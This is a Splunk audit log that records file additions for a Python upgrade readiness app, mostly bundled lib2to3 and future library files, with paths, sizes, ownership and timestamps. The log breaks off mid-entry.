Audit:[timestamp=10-06-2022 17:41:50.761, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/bom.py", isdir=0, size=37, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.757, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/README", isdir=0, size=404, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.653, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/test_util.py", isdir=0, size=21207, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.649, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/test_refactor.py", isdir=0, size=12446, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.646, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/test_pytree.py", isdir=0, size=16382, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.642, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/test_parser.py", isdir=0, size=20841, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.638, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/test_main.py", isdir=0, size=5740, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.634, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/test_fixers.py", isdir=0, size=122562, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.630, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/test_all_fixers.py", isdir=0, size=595, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.624, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/support.py", isdir=0, size=1948, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.620, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/pytree_idempotency.py", isdir=0, size=2453, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.616, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.611, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/__main__.py", isdir=0, size=58, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.605, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/__init__.py", isdir=0, size=168, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.499, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/tokenize.py", isdir=0, size=21081, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.495, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/token.py", isdir=0, size=1286, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.490, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/pgen.py", isdir=0, size=13812, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.486, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/parse.py", isdir=0, size=8053, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.481, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/literals.py", isdir=0, size=1635, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.477, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/grammar.py", isdir=0, size=6579, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.472, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/driver.py", isdir=0, size=5983, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.468, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/conv.py", isdir=0, size=9642, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.464, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2/__init__.py", isdir=0, size=143, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.459, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.454, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/refactor.py", isdir=0, size=27440, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.448, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pytree.py", isdir=0, size=27960, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.443, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pygram.py", isdir=0, size=1154, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.440, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/pgen2", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.436, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/patcomp.py", isdir=0, size=7054, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.430, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/main.py", isdir=0, size=11653, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.425, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.421, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixer_util.py", isdir=0, size=15207, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.415, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixer_base.py", isdir=0, size=6690, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.411, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/btm_utils.py", isdir=0, size=9966, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.407, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/btm_matcher.py", isdir=0, size=6623, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.402, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/__main__.py", isdir=0, size=67, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.398, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/__init__.py", isdir=0, size=7, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.392, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/PatternGrammar3.7.4.final.0.pickle", isdir=0, size=2093, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.387, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/PatternGrammar3.7.3.final.0.pickle", isdir=0, size=2093, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.382, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/PatternGrammar.txt", isdir=0, size=793, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.378, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/Grammar3.7.4.final.0.pickle", isdir=0, size=32252, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.372, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/Grammar3.7.3.final.0.pickle", isdir=0, size=32252, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.368, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/Grammar.txt", isdir=0, size=6562, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.163, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newstr.py", isdir=0, size=15464, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.159, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newrange.py", isdir=0, size=5195, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.154, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newopen.py", isdir=0, size=810, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.150, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newobject.py", isdir=0, size=3339, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.145, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newmemoryview.py", isdir=0, size=654, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.141, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newlist.py", isdir=0, size=2284, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.136, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newint.py", isdir=0, size=13233, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.130, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newdict.py", isdir=0, size=3100, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.126, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/newbytes.py", isdir=0, size=16238, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.121, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/types/__init__.py", isdir=0, size=6831, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.015, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/http/server.py", isdir=0, size=45523, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.010, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/http/cookies.py", isdir=0, size=21569, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.005, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/http/cookiejar.py", isdir=0, size=76542, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.001, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/http/client.py", isdir=0, size=47192, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.995, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/http/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.891, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/urllib/robotparser.py", isdir=0, size=6865, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.887, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/urllib/response.py", isdir=0, size=3180, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.883, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/urllib/request.py", isdir=0, size=96184, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.879, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/urllib/parse.py", isdir=0, size=35792, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.876, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/urllib/error.py", isdir=0, size=2715, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.872, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/urllib/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.869, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/xmlrpc/server.py", isdir=0, size=37285, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.866, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/xmlrpc/client.py", isdir=0, size=48133, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.862, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/xmlrpc/__init__.py", isdir=0, size=38, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.858, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/support.py", isdir=0, size=70881, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.854, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/ssl_servers.py", isdir=0, size=7209, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.851, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/ssl_key.pem", isdir=0, size=916, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.847, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/ssl_key.passwd.pem", isdir=0, size=963, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.843, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/ssl_cert.pem", isdir=0, size=867, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.838, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/sha256.pem", isdir=0, size=8344, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.833, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/pystone.py", isdir=0, size=7427, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.828, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/nullcert.pem", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.823, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/nullbytecert.pem", isdir=0, size=5435, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.818, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/nokia.pem", isdir=0, size=1923, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.813, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/keycert2.pem", isdir=0, size=1795, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.809, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/keycert.pem", isdir=0, size=1783, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.805, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/keycert.passwd.pem", isdir=0, size=1830, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.800, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/https_svn_python_org_root.pem", isdir=0, size=2569, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.793, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/dh512.pem", isdir=0, size=402, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.789, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/badkey.pem", isdir=0, size=2162, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.783, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/badcert.pem", isdir=0, size=1928, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.779, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/test/__init__.py", isdir=0, size=264, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.573, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/html/parser.py", isdir=0, size=19770, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.569, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/html/entities.py", isdir=0, size=75428, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.564, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/html/__init__.py", isdir=0, size=924, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.560, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/text.py", isdir=0, size=1552, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.556, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/nonmultipart.py", isdir=0, size=832, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.552, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/multipart.py", isdir=0, size=1699, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.548, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/message.py", isdir=0, size=1429, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.545, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/image.py", isdir=0, size=1907, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.541, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/base.py", isdir=0, size=875, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:49.537, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/future/backports/email/mime/audio.py", isdir=0, size=2815, gid=41812, uid=41812, 